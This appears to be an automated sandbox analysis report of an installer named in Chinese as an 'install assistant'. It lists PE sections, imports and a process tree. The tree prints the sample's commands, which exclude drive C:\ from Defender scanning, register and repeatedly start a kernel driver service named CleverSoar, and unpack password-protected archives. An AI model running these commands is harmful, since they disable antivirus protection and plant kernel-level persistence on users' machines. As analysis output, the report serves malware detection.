                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x11000ae78e7ec4c172739526732707a28f0f9False0.187744140625data3.7229388634712897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.2769121813031161
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            No network behavior found

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:22:52:01
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
                            Imagebase:0x900000
                            File size:8'595'621 bytes
                            MD5 hash:F2845D6410A0D9A090D414F3AE742E3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
                            Imagebase:0xce0000
                            File size:3'366'912 bytes
                            MD5 hash:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:22:52:03
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
                            Imagebase:0x900000
                            File size:8'595'621 bytes
                            MD5 hash:F2845D6410A0D9A090D414F3AE742E3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:22:52:04
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
                            Imagebase:0xa50000
                            File size:3'366'912 bytes
                            MD5 hash:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:22:52:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x710000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:22:52:08
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x710000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:13
                            Start time:22:52:08
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff6ef0c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:26
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6d64d0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:22:52:11
                            Start date:23/12/2024
